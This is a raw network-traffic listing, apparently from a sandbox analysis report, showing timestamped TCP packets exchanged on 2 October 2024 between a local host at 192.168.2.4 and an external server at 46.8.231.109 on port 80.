Oct 2, 2024 09:41:21.873858929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.873894930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.873929977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874047995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874080896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874115944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874156952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874156952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874156952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874156952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874156952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874156952 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874167919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874202967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874236107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874269962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874303102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874335051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874345064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874345064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874360085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874360085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874371052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874403000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874407053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874403000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874445915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874481916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874516010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874548912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874634981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874660015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874660015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874660015 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874684095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874686003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874723911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874775887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874778032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874778032 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874830008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874885082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874919891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874952078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874986887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.874993086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874993086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874993086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874993086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.874993086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875024080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875078917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875113964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875118017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875118017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875118017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875169039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875202894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875236988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875272989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875308037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875313044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875313044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875313044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875313044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875313044 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875343084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875355005 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875376940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875399113 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875432014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875456095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875467062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875500917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875525951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875525951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875535011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875570059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875586033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875586033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875602007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875637054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875670910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875705004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875706911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875706911 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875751972 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875758886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875802994 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.875813007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875864983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875900984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875933886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.875967026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876002073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876054049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876085997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876097918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876097918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876097918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876097918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876097918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876097918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876097918 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876122952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876156092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876210928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876244068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876276970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876310110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876344919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876352072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876352072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876352072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876352072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876352072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876352072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876352072 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.876379013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876414061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876446009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.876482010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.877068043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.877068043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.877068043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.877068043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.879497051 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.879661083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.879726887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.879726887 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.948443890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.948496103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.948534012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.948568106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.948604107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.948637009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.948678017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.948745012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.948745012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.948745012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.948745012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955176115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955240011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955291033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955324888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955378056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955410004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955410004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955424070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955436945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955471992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955503941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955555916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955590010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955625057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955676079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955715895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955754042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955754042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955754042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955754042 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.955779076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955813885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955866098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955899954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955931902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.955967903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956001043 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956036091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956068039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956099987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956135035 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956159115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956159115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956159115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956159115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956159115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956159115 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956168890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956202984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956238985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956270933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956306934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.956527948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956527948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956527948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956527948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956527948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.956527948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.962680101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.962789059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.962841988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.962984085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963038921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963073015 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963113070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.963200092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963233948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963288069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963323116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963357925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963413954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.963413954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.963413954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.963521004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963557005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963814020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963848114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963881016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963916063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963949919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.963984013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964018106 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964189053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964222908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964257002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964266062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964266062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964266062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964266062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964266062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964266062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964266062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964292049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964344978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964378119 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964411020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964443922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964495897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964529991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964564085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964570999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964570999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964570999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964570999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964570999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964570999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964570999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964596987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964649916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964684010 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964716911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964749098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964802980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964835882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964843035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964843035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964843035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964843035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964843035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964843035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964843035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.964873075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964906931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964941978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.964984894 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965018034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965051889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965090990 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965090990 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965091944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965091944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965091944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965091944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965091944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965105057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965140104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965173006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965205908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965238094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965270996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965303898 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965336084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965346098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965346098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965346098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965346098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965346098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965346098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965346098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965374947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965409040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965441942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965475082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965508938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965542078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965575933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965583086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965583086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965583086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965584040 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965584040 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965584040 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965584040 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965609074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965643883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965672970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965706110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965745926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965747118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965747118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965747118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965747118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965747118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965781927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965816975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965851068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965883970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965918064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965950966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965982914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.965991020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965991020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965991020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965991020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965991020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965991020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.965991020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.966017962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966051102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966084957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966120005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966152906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966186047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966193914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.966193914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.966193914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.966193914 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.966195107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.966195107 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.966221094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966258049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.966922045 CEST	49749	80	192.168.2.4	46.8.231.109
